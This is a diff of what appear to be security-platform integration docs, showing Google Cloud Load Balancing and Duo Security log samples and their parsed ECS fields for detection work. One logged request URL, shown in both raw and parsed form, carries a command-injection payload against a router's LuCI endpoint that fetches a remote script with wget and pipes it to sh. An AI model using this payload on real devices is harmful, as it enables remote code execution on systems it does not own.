"id": "integration-gcloadbalancing" + }, + "provider": "Google Cloud", + "service": { + "name": "Load Balancing" + } + }, + "google_cloud_load_balancing": { + "insertId": "1t7m3mbf14kc7c", + "logName": "projects/integration-gcloadbalancing/logs/loadbalancing.googleapis.com%2Fexternal_regional_requests", + "priority": "2147483646", + "receiveTimestamp": "2024-08-26T15:30:31.15568806Z", + "severity": "WARNING" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 503 + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "rule": { + "name": "policy-name" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 49194 + }, + "url": { + "domain": "5.6.7.8", + "original": "http://5.6.7.8:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)", + "path": "/cgi-bin/luci/;stok=/locale", + "port": 80, + "query": "form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)", + "scheme": "http" + } + } + + ``` + + +=== "accepted.json" + + ```json + + { + "message": "{\"httpRequest\": {\"latency\": \"0.006023s\", \"remoteIp\": \"1.2.3.4\", \"requestMethod\": \"GET\", \"requestSize\": \"1012\", \"requestUrl\": \"https://example.org/api-services/api/ping\", \"responseSize\": \"307\", \"serverIp\": \"5.6.7.8\", \"status\": 200, \"userAgent\": \"Apache-HttpClient/5.2.1 (Java/21.0.1)\"}, \"insertId\": \"1t7m3mbf14kc7c\", \"jsonPayload\": {\"@type\": \"type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry\", \"backendTargetProjectNumber\": \"projects/12345678\", \"cacheDecision\": [\"RESPONSE_HAS_CONTENT_TYPE\", \"REQUEST_HAS_AUTHORIZATION\", \"CACHE_MODE_USE_ORIGIN_HEADERS\"], \"enforcedSecurityPolicy\": {\"configuredAction\": \"ALLOW\", \"name\": \"cloud-armor-rule-policy-name-01\", \"outcome\": \"ACCEPT\", \"priority\": 2147483647}, \"remoteIp\": \"1.2.3.4\", \"securityPolicyRequestData\": {\"remoteIpInfo\": {\"regionCode\": \"BE\"}, \"tlsJa3Fingerprint\": \"c691c8ec005d3a6a8aafc394edf6c1a3\"}, \"statusDetails\": \"response_sent_by_backend\"}, \"logName\": \"projects/google-project/logs/requests\", \"receiveTimestamp\": \"2024-02-20T15:03:01.755764847Z\", \"resource\": {\"labels\": {\"backend_service_name\": \"google-project-backend-03\", \"forwarding_rule_name\": \"google-project-ip-pub-03\", \"project_id\": \"google-project\", \"target_proxy_name\": \"google-project-lb-03-target-proxy\", \"url_map_name\": \"google-project-lb-03\", \"zone\": \"global\"}, \"type\": \"http_load_balancer\"}, \"severity\": \"INFO\", \"spanId\": \"74f69181f79f8236\", \"timestamp\": \"2024-02-20T15:03:00.867759Z\", \"trace\": \"projects/google-project/traces/ff592ffa0c72bac07e758a3851fd44f5\"}", + "event": { + "action": "ALLOW", + "category": [ + "web" + ], + "outcome": "ACCEPT", + "type": [ + "access" + ] + }, + "@timestamp": "2024-02-20T15:03:00.867759Z", + "cloud": { + "project": { + "id": "google-project" + }, + "provider": "Google Cloud", + "region": "global", + "service": { + "name": "Load Balancing" + } + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8" + }, + "google_cloud_load_balancing": { + "insertId": "1t7m3mbf14kc7c", + "logName": "projects/google-project/logs/requests", + "priority": "2147483647", + "receiveTimestamp": "2024-02-20T15:03:01.755764847Z", + "severity": "INFO" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "name": "cloud-armor-rule-policy-name-01" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "example.org", + "original": "https://example.org/api-services/api/ping", + "path": "/api-services/api/ping", + "port": 443, + "registered_domain": "example.org", + "scheme": "https", + "top_level_domain": "org" + } + } + + ``` + + +=== "denied.json" + + ```json + + { + "message": "{\"insertId\": \"tyvh8vfi0k1di\", \"jsonPayload\": {\"remoteIp\": \"1.2.3.4\", \"backendTargetProjectNumber\": \"projects/123456789\", \"@type\": \"type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry\", \"statusDetails\": \"denied_by_security_policy\", \"cacheDecision\": [\"RESPONSE_HAS_CONTENT_TYPE\", \"REQUEST_HAS_IF_NONE_MATCH\", \"CACHE_MODE_USE_ORIGIN_HEADERS\"], \"enforcedSecurityPolicy\": {\"priority\": 1000, \"outcome\": \"DENY\", \"configuredAction\": \"DENY\", \"name\": \"block-all-http-requests\"}}, \"httpRequest\": {\"requestMethod\": \"GET\", \"requestUrl\": \"http://malicious.site/url\", \"requestSize\": \"488\", \"status\": 403, \"responseSize\": \"258\", \"userAgent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\", \"remoteIp\": \"1.2.3.4\", \"latency\": \"0.102957s\"}, \"resource\": {\"type\": \"http_load_balancer\", \"labels\": {\"target_proxy_name\": \"http-lb-proxy\", \"project_id\": \"project_id\", \"zone\": \"global\", \"url_map_name\": \"http-load-balancer\", \"forwarding_rule_name\": \"http-content-rule\", \"backend_service_name\": \"backend-service\"}}, \"timestamp\": \"2023-12-25T07:17:32.061039Z\", \"severity\": \"WARNING\", \"logName\": \"projects/project_id/logs/requests\", \"trace\": \"projects/project_id/traces/15dc480f7c7879c404b6b33843099866\", \"receiveTimestamp\": \"2023-12-25T07:17:33.457621996Z\", \"spanId\": \"25c549956d7c28e2\"}", + "event": { + "action": "DENY", + "category": [ + "web" + ], + "outcome": "DENY", + "type": [ + "access" + ] + }, + "@timestamp": "2023-12-25T07:17:32.061039Z", + "cloud": { + "project": { + "id": "project_id" + }, + "provider": "Google Cloud", + "region": "global", + "service": { + "name": "Load Balancing" + } + }, + "google_cloud_load_balancing": { + "insertId": "tyvh8vfi0k1di", + "logName": "projects/project_id/logs/requests", + "priority": "1000", + "receiveTimestamp": "2023-12-25T07:17:33.457621996Z", + "severity": "WARNING" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 403 + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "rule": { + "name": "block-all-http-requests" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "malicious.site", + "original": "http://malicious.site/url", + "path": "/url", + "port": 80, + "registered_domain": "malicious.site", + "scheme": "http", + "top_level_domain": "site" + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`@timestamp` | `date` | Date/time when the event originated. | +|`cloud.project.id` | `keyword` | The cloud project id. | +|`cloud.provider` | `keyword` | Name of the cloud provider. | +|`cloud.region` | `keyword` | Region in which this host, resource, or service is located. | +|`cloud.service.name` | `keyword` | The cloud service name. | +|`destination.ip` | `ip` | IP address of the destination. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.outcome` | `keyword` | The outcome of the event. The lowest level categorization field in the hierarchy. | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`google_cloud_load_balancing.insertId` | `keyword` | A unique identifier for the log entry. | +|`google_cloud_load_balancing.logName` | `keyword` | The resource name of the log to which this log entry belongs to. | +|`google_cloud_load_balancing.priority` | `keyword` | | +|`google_cloud_load_balancing.receiveTimestamp` | `keyword` | The time the log entry was received by Logging. | +|`google_cloud_load_balancing.severity` | `keyword` | The severity of the log entry. | +|`google_cloud_load_balancing.statusDetails` | `keyword` | | +|`http.request.method` | `keyword` | HTTP request method. | +|`http.request.referrer` | `keyword` | Referrer for this HTTP request. | +|`http.response.status_code` | `long` | HTTP response status code. | +|`rule.name` | `keyword` | Rule name | +|`source.geo.region_iso_code` | `keyword` | Region ISO code. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`user_agent.original` | `keyword` | Unparsed user_agent string. | + + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Google Cloud/Google Cloud Load Balancing). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb_sample.md b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb_sample.md new file mode 100644 index 0000000000..a0ca8cd2b5 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb_sample.md @@ -0,0 +1,182 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "accept_with_port" + + + ```json + { + "httpRequest": { + "latency": "0.001115s", + "protocol": "HTTP/1.1", + "remoteIp": "1.2.3.4:49194", + "requestMethod": "GET", + "requestSize": "201", + "requestUrl": "http://5.6.7.8:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)", + "responseSize": "155", + "status": 503, + "userAgent": "Go-http-client/1.1" + }, + "insertId": "1t7m3mbf14kc7c", + "jsonPayload": { + "@type": "type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry", + "backendTargetProjectNumber": "projects/111111111111", + "enforcedSecurityPolicy": { + "configuredAction": "THROTTLE", + "name": "policy-name", + "outcome": "ACCEPT", + "priority": 2147483646, + "rateLimitAction": { + "key": "1.2.3.4", + "outcome": "RATE_LIMIT_THRESHOLD_CONFORM" + } + }, + "proxyStatus": "error=\"destination_unavailable\"; details=\"failed_to_pick_backend\"" + }, + "logName": "projects/integration-gcloadbalancing/logs/loadbalancing.googleapis.com%2Fexternal_regional_requests", + "receiveTimestamp": "2024-08-26T15:30:31.15568806Z", + "resource": { + "labels": { + "backend_name": "", + "backend_scope": "UNKNOWN", + "backend_scope_type": "UNKNOWN", + "backend_target_name": "backend-name", + "backend_target_type": "BACKEND_SERVICE", + "backend_type": "UNKNOWN", + "forwarding_rule_name": "forwarding_rule-name", + "matched_url_path_rule": "UNMATCHED", + "network_name": "default", + "project_id": "integration-gcloadbalancing", + "region": "europe-west9", + "target_proxy_name": "proxy-name", + "url_map_name": "url_map-name" + }, + "type": "http_external_regional_lb_rule" + }, + "severity": "WARNING", + "timestamp": "2024-08-26T15:30:27.62577Z" + } + ``` + + + +=== "accepted" + + + ```json + { + "httpRequest": { + "latency": "0.006023s", + "remoteIp": "1.2.3.4", + "requestMethod": "GET", + "requestSize": "1012", + "requestUrl": "https://example.org/api-services/api/ping", + "responseSize": "307", + "serverIp": "5.6.7.8", + "status": 200, + "userAgent": "Apache-HttpClient/5.2.1 (Java/21.0.1)" + }, + "insertId": "1t7m3mbf14kc7c", + "jsonPayload": { + "@type": "type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry", + "backendTargetProjectNumber": "projects/12345678", + "cacheDecision": [ + "RESPONSE_HAS_CONTENT_TYPE", + "REQUEST_HAS_AUTHORIZATION", + "CACHE_MODE_USE_ORIGIN_HEADERS" + ], + "enforcedSecurityPolicy": { + "configuredAction": "ALLOW", + "name": "cloud-armor-rule-policy-name-01", + "outcome": "ACCEPT", + "priority": 2147483647 + }, + "remoteIp": "1.2.3.4", + "securityPolicyRequestData": { + "remoteIpInfo": { + "regionCode": "BE" + }, + "tlsJa3Fingerprint": "c691c8ec005d3a6a8aafc394edf6c1a3" + }, + "statusDetails": "response_sent_by_backend" + }, + "logName": "projects/google-project/logs/requests", + "receiveTimestamp": "2024-02-20T15:03:01.755764847Z", + "resource": { + "labels": { + "backend_service_name": "google-project-backend-03", + "forwarding_rule_name": "google-project-ip-pub-03", + "project_id": "google-project", + "target_proxy_name": "google-project-lb-03-target-proxy", + "url_map_name": "google-project-lb-03", + "zone": "global" + }, + "type": "http_load_balancer" + }, + "severity": "INFO", + "spanId": "74f69181f79f8236", + "timestamp": "2024-02-20T15:03:00.867759Z", + "trace": "projects/google-project/traces/ff592ffa0c72bac07e758a3851fd44f5" + } + ``` + + + +=== "denied" + + + ```json + { + "insertId": "tyvh8vfi0k1di", + "jsonPayload": { + "remoteIp": "1.2.3.4", + "backendTargetProjectNumber": "projects/123456789", + "@type": "type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry", + "statusDetails": "denied_by_security_policy", + "cacheDecision": [ + "RESPONSE_HAS_CONTENT_TYPE", + "REQUEST_HAS_IF_NONE_MATCH", + "CACHE_MODE_USE_ORIGIN_HEADERS" + ], + "enforcedSecurityPolicy": { + "priority": 1000, + "outcome": "DENY", + "configuredAction": "DENY", + "name": "block-all-http-requests" + } + }, + "httpRequest": { + "requestMethod": "GET", + "requestUrl": "http://malicious.site/url", + "requestSize": "488", + "status": 403, + "responseSize": "258", + "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "remoteIp": "1.2.3.4", + "latency": "0.102957s" + }, + "resource": { + "type": "http_load_balancer", + "labels": { + "target_proxy_name": "http-lb-proxy", + "project_id": "project_id", + "zone": "global", + "url_map_name": "http-load-balancer", + "forwarding_rule_name": "http-content-rule", + "backend_service_name": "backend-service" + } + }, + "timestamp": "2023-12-25T07:17:32.061039Z", + "severity": "WARNING", + "logName": "projects/project_id/logs/requests", + "trace": "projects/project_id/traces/15dc480f7c7879c404b6b33843099866", + "receiveTimestamp": "2023-12-25T07:17:33.457621996Z", + "spanId": "25c549956d7c28e2" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md b/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md index 1f33440050..3610d52910 100644 --- a/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md +++ b/_shared_content/operations_center/integrations/generated/515ed00f-bf70-4fce-96cc-0ca31abd5d24.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "flow_logs_gke.json" diff --git a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md index 291007dee5..e158d4f22e 100644 --- a/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md +++ b/_shared_content/operations_center/integrations/generated/547234b3-82ea-4507-b28f-3ee3cd5b9a8e.md @@ -25,20 +25,73 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "test_admin_log.json" + + ```json + + { + "message": "{\"action\": \"admin_login\", \"description\": \"{\\\"ip_address\\\": \\\"1.2.3.4\\\", \\\"role\\\": \\\"Owner\\\", \\\"device\\\": \\\"+555 123456\\\", \\\"factor\\\": \\\"push\\\", \\\"primary_auth_method\\\": \\\"Password\\\"}\", \"isotimestamp\": \"2024-08-06T09:52:42+00:00\", \"object\": null, \"timestamp\": 1722937962, \"username\": \"John Doe\", \"eventtype\": \"admin_log\", \"host\": \"example.duosecurity.com\"}", + "event": { + "action": "admin_login", + "category": [ + "iam" + ], + "dataset": "admin_log", + "type": [ + "admin" + ] + }, + "@timestamp": "2024-08-06T09:52:42Z", + "duo": { + "security": { + "telephony": { + "phone_number": "+555 123456" + } + } + }, + "observer": { + "hostname": "example.duosecurity.com", + "product": "Duo Security", + "vendor": "Duo" + }, + "related": { + "hosts": [ + "example.duosecurity.com" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "John Doe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "John Doe" + } + } + + ``` + === "test_admin_log_error.json" ```json { - "message": "{\n \"eventtype\": \"admin_log\",\n \"action\": \"admin_login_error\",\n \"description\": \"{\\\"ip_address\\\": \\\"10.1.23.116\\\", \\\"error\\\": \\\"SAML login is disabled\\\", \\\"email\\\": \\\"narroway@example.com\\\"}\",\n \"isotimestamp\": \"2020-01-23T16:18:58+00:00\",\n \"object\": null,\n \"timestamp\": 1579796338,\n \"username\": \"\"\n}", + "message": "{\"eventtype\": \"admin_log\", \"action\": \"admin_login_error\", \"description\": \"{\\\"ip_address\\\": \\\"10.1.23.116\\\", \\\"error\\\": \\\"SAML login is disabled\\\", \\\"email\\\": \\\"narroway@example.com\\\"}\", \"isotimestamp\": \"2020-01-23T16:18:58+00:00\", \"object\": null, \"timestamp\": 1579796338, \"username\": \"\"}", "event": { "action": "admin_login_error", "category": [ "iam" ], "dataset": "admin_log", + "reason": "SAML login is disabled", "type": [ "admin" ] @@ -47,6 +100,18 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "observer": { "product": "Duo Security", "vendor": "Duo" + }, + "related": { + "ip": [ + "10.1.23.116" + ] + }, + "source": { + "address": "10.1.23.116", + "ip": "10.1.23.116" + }, + "user": { + "email": "narroway@example.com" } } @@ -58,7 +123,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"admin_log\",\n \"action\": \"user_update\",\n \"description\": \"{\\\"notes\\\": \\\"Joe asked for their nickname to be displayed instead of Joseph.\\\", \\\"realname\\\": \\\"Joe Smith\\\"}\",\n \"isotimestamp\": \"2020-01-24T15:09:42+00:00\",\n \"object\": \"jsmith\",\n \"timestamp\": 1579878582,\n \"username\": \"admin\"\n}", + "message": "{\"eventtype\": \"admin_log\", \"action\": \"user_update\", \"description\": \"{\\\"notes\\\": \\\"Joe asked for their nickname to be displayed instead of Joseph.\\\", \\\"realname\\\": \\\"Joe Smith\\\"}\", \"isotimestamp\": \"2020-01-24T15:09:42+00:00\", \"object\": \"jsmith\", \"timestamp\": 1579878582, \"username\": \"admin\"}", "event": { "action": "user_update", "category": [ @@ -97,7 +162,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"auth_log\",\n \"access_device\": {\n \"browser\": \"Chrome\",\n \"browser_version\": \"67.0.3396.99\",\n \"flash_version\": \"uninstalled\",\n \"hostname\": null,\n \"ip\": \"169.232.89.219\",\n \"is_encryption_enabled\": true,\n \"is_firewall_enabled\": true,\n \"is_password_set\": true,\n \"java_version\": \"uninstalled\",\n \"location\": {\n \"city\": \"Ann Arbor\",\n \"country\": \"United States\",\n \"state\": \"Michigan\"\n },\n \"os\": \"Mac OS X\",\n \"os_version\": \"10.14.1\",\n \"security_agents\": []\n },\n \"adaptive_trust_assessments\": {\n \"more_secure_auth\": {\n \"features_version\": \"3.0\",\n \"model_version\": \"2022.07.19.001\",\n \"policy_enabled\": false,\n \"reason\": \"Normal level of trust; no detection of known attack pattern\",\n \"trust_level\": \"NORMAL\"\n },\n \"remember_me\": {\n \"features_version\": \"3.0\",\n \"model_version\": \"2022.07.19.001\",\n \"policy_enabled\": false,\n \"reason\": \"Known Access IP\",\n \"trust_level\": \"NORMAL\"\n }\n },\n \"alias\": \"\",\n \"application\": {\n \"key\": \"DIY231J8BR23QK4UKBY8\",\n \"name\": \"Microsoft Azure Active Directory\"\n },\n \"auth_device\": {\n \"ip\": \"192.168.225.254\",\n \"key\": \"DP5BJ05HI4WRBVI4Q7JF\",\n \"location\": {\n \"city\": \"Ann Arbor\",\n \"country\": \"United States\",\n \"state\": \"Michigan\"\n },\n \"name\": \"My iPhone X (734-555-2342)\"\n },\n \"email\": \"narroway@example.com\",\n \"event_type\": \"authentication\",\n \"factor\": \"duo_push\",\n \"isotimestamp\": \"2020-02-13T18:56:20.351346+00:00\",\n \"ood_software\": null,\n \"reason\": \"user_approved\",\n \"result\": \"success\",\n \"timestamp\": 1581620180,\n \"trusted_endpoint_status\": \"not trusted\",\n \"txid\": \"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\n \"user\": {\n \"groups\": [\"Duo Users\", \"CorpHQ Users\"],\n \"key\": \"DU3KC77WJ06Y5HIV7XKQ\",\n \"name\": \"narroway@example.com\"\n }\n}", + "message": "{\"eventtype\": \"auth_log\", \"access_device\": {\"browser\": \"Chrome\", \"browser_version\": \"67.0.3396.99\", \"flash_version\": \"uninstalled\", \"hostname\": null, \"ip\": \"169.232.89.219\", \"is_encryption_enabled\": true, \"is_firewall_enabled\": true, \"is_password_set\": true, \"java_version\": \"uninstalled\", \"location\": {\"city\": \"Ann Arbor\", \"country\": \"United States\", \"state\": \"Michigan\"}, \"os\": \"Mac OS X\", \"os_version\": \"10.14.1\", \"security_agents\": []}, \"adaptive_trust_assessments\": {\"more_secure_auth\": {\"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"reason\": \"Normal level of trust; no detection of known attack pattern\", \"trust_level\": \"NORMAL\"}, \"remember_me\": {\"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"reason\": \"Known Access IP\", \"trust_level\": \"NORMAL\"}}, \"alias\": \"\", \"application\": {\"key\": \"DIY231J8BR23QK4UKBY8\", \"name\": \"Microsoft Azure Active Directory\"}, \"auth_device\": {\"ip\": \"192.168.225.254\", \"key\": \"DP5BJ05HI4WRBVI4Q7JF\", \"location\": {\"city\": \"Ann Arbor\", \"country\": \"United States\", \"state\": \"Michigan\"}, \"name\": \"My iPhone X (734-555-2342)\"}, \"email\": \"narroway@example.com\", \"event_type\": \"authentication\", \"factor\": \"duo_push\", \"isotimestamp\": \"2020-02-13T18:56:20.351346+00:00\", \"ood_software\": null, \"reason\": \"user_approved\", \"result\": \"success\", \"timestamp\": 1581620180, \"trusted_endpoint_status\": \"not trusted\", \"txid\": \"340a23e3-23f3-23c1-87dc-1491a23dfdbb\", \"user\": {\"groups\": [\"Duo Users\", \"CorpHQ Users\"], \"key\": \"DU3KC77WJ06Y5HIV7XKQ\", \"name\": \"narroway@example.com\"}}", "event": { "category": [ "authentication" @@ -121,6 +186,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "169.232.89.219" + ], + "user": [ + "narroway@example.com" ] }, "source": { @@ -135,6 +203,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user": { "email": "narroway@example.com", "id": "DU3KC77WJ06Y5HIV7XKQ", + "name": "narroway@example.com", "roles": [ "CorpHQ Users", "Duo Users" @@ -149,12 +218,76 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_auth_log_2.json" + + ```json + + { + "message": "{\"access_device\": {\"browser\": \"Electron\", \"browser_version\": \"11.5.0\", \"epkey\": \"EPKEYEXAMPLE\", \"flash_version\": \"uninstalled\", \"hostname\": null, \"ip\": \"1.2.3.4\", \"is_encryption_enabled\": \"unknown\", \"is_firewall_enabled\": \"unknown\", \"is_password_set\": \"unknown\", \"java_version\": \"uninstalled\", \"location\": {\"city\": \"Paris\", \"country\": \"France\", \"state\": \"\\u00cele-de-France\"}, \"os\": \"Windows\", \"os_version\": \"10\"}, \"adaptive_trust_assessments\": {\"more_secure_auth\": {\"detected_attack_detectors\": null, \"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"preview_mode_enabled\": true, \"reason\": \"Normal level of trust; no detection of known attack pattern\", \"trust_level\": \"NORMAL\"}, \"remember_me\": {\"features_version\": \"3.0\", \"model_version\": \"2022.07.19.001\", \"policy_enabled\": false, \"reason\": \"Known Access IP\", \"trust_level\": \"NORMAL\"}}, \"alias\": \"\", \"application\": {\"key\": \"APPLICATIONKEY\", \"name\": \"Fortigate VPN SSL - Single Sign-On\"}, \"auth_device\": {\"ip\": null, \"key\": null, \"location\": {\"city\": null, \"country\": null, \"state\": null}, \"name\": null}, \"email\": \"john.doe@example.com\", \"event_type\": \"authentication\", \"factor\": \"remembered_device\", \"isotimestamp\": \"2024-08-06T13:06:35.435426+00:00\", \"ood_software\": null, \"rbfs_triggered_attacks\": null, \"reason\": \"remembered_device\", \"remembered_factor\": \"duo_push\", \"result\": \"success\", \"timestamp\": 1722949595, \"trusted_endpoint_status\": \"unknown\", \"txid\": \"9f79ad67-e7f5-4f33-850c-75175d79253a\", \"user\": {\"groups\": [\"GG_VPN_DUO (from AD sync \\\"AD Sync\\\")\"], \"key\": \"EXAMPLEKEY\", \"name\": \"vsainterosemeril\"}, \"eventtype\": \"auth_log\", \"host\": \"example.duosecurity.com\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "auth_log", + "type": [ + "info" + ] + }, + "@timestamp": "2024-08-06T13:06:35.435426Z", + "host": { + "os": { + "name": "Windows", + "version": "10" + } + }, + "observer": { + "hostname": "example.duosecurity.com", + "product": "Duo Security", + "vendor": "Duo" + }, + "related": { + "hosts": [ + "example.duosecurity.com" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "vsainterosemeril" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "city_name": "Paris", + "country_name": "France", + "region_name": "\u00cele-de-France" + }, + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@example.com", + "id": "EXAMPLEKEY", + "name": "vsainterosemeril", + "roles": [ + "GG_VPN_DUO (from AD sync \"AD Sync\")" + ] + }, + "user_agent": { + "name": "Electron", + "version": "11.5.0" + } + } + + ``` + + === "test_offline_log.json" ```json { - "message": "{\n \"eventtype\": \"offline_log\",\n \"action\": \"o2fa_user_provisioned\",\n \"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\",\n \"isotimestamp\": \"2019-08-30T16:10:05+00:00\",\n \"object\": \"Acme Laptop Windows Logon\",\n \"timestamp\": 1567181405,\n \"username\": \"narroway\"\n}", + "message": "{\"eventtype\": \"offline_log\", \"action\": \"o2fa_user_provisioned\", \"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\", \"isotimestamp\": \"2019-08-30T16:10:05+00:00\", \"object\": \"Acme Laptop Windows Logon\", \"timestamp\": 1567181405, \"username\": \"narroway\"}", "event": { "action": "o2fa_user_provisioned", "category": [ @@ -207,7 +340,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"telephony_log\",\n \"context\": \"administrator login\",\n \"credits\": 0,\n \"phone\": \"+13135559542\",\n \"telephony_id\": \"5bf1a860-fe39-49e3-be29-217659663a74\",\n \"ts\": \"2022-10-25T16:07:45.304526+00:00\",\n \"txid\": \"fb0c129b-f994-4d3d-953b-c3e764272eb7\",\n \"type\": \"sms\"\n}", + "message": "{\"eventtype\": \"telephony_log\", \"context\": \"administrator login\", \"credits\": 0, \"phone\": \"+13135559542\", \"telephony_id\": \"5bf1a860-fe39-49e3-be29-217659663a74\", \"ts\": \"2022-10-25T16:07:45.304526+00:00\", \"txid\": \"fb0c129b-f994-4d3d-953b-c3e764272eb7\", \"type\": \"sms\"}", "event": { "category": [ "authentication" @@ -240,7 +373,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\n \"eventtype\": \"telephony_log\",\n \"context\": \"authentication\",\n \"credits\": 2,\n \"phone\": \"+17345551311\",\n \"telephony_id\": \"60799fee-f08f-4ba8-971f-4e53b3473e9a\",\n \"ts\": \"2023-01-26T20:54:12.573580+00:00\",\n \"txid\": \"373bd5f3-1e42-4a5d-aefa-b33ae278fac8\",\n \"type\": \"phone\"\n}", + "message": "{\"eventtype\": \"telephony_log\", \"context\": \"authentication\", \"credits\": 2, \"phone\": \"+17345551311\", \"telephony_id\": \"60799fee-f08f-4ba8-971f-4e53b3473e9a\", \"ts\": \"2023-01-26T20:54:12.573580+00:00\", \"txid\": 